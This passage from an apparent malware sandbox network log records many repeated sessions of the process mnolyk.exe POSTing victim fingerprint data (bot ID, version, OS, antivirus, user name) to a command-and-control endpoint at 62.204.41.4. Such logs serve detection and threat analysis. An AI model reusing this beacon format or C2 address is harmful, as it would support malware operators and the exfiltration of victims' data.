                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      528192.168.2.75025662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:20.656894922 CET988OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:20.720566988 CET988INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      529192.168.2.75025762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:20.892807961 CET989OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:20.958321095 CET989INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      53192.168.2.74977762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:10.512878895 CET485OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:10.578663111 CET485INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      530192.168.2.75025862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:21.134136915 CET990OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:21.199671030 CET990INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      531192.168.2.75025962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:21.378413916 CET991OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:21.441360950 CET991INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      532192.168.2.75026062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:21.613962889 CET992OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:21.679806948 CET992INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      533192.168.2.75026162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:21.845479965 CET993OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:21.910104036 CET993INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      534192.168.2.75026262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:22.083151102 CET994OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:22.147461891 CET994INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      535192.168.2.75026362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:22.311707973 CET995OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:22.375593901 CET995INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      536192.168.2.75026462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:22.550322056 CET996OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:22.616416931 CET996INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      537192.168.2.75026562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:22.792860985 CET997OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:22.857007980 CET997INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:22 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      538192.168.2.75026662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:23.033535004 CET998OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:23.100374937 CET998INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      539192.168.2.75026762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:23.274291992 CET999OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:23.339706898 CET999INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      54192.168.2.74977862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:10.754395962 CET486OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:10.817142010 CET486INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      540192.168.2.75026862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:23.521301031 CET1000OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:23.585572958 CET1000INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      541192.168.2.75026962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:23.765845060 CET1001OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:23.828995943 CET1001INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      542192.168.2.75027062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:23.999396086 CET1002OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:24.064944983 CET1002INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      543192.168.2.75027162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:24.266112089 CET1003OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:24.329607010 CET1003INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      544192.168.2.75027262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:24.734925032 CET1004OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:24.798865080 CET1004INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      545192.168.2.75027362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:38:25.058834076 CET1005OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
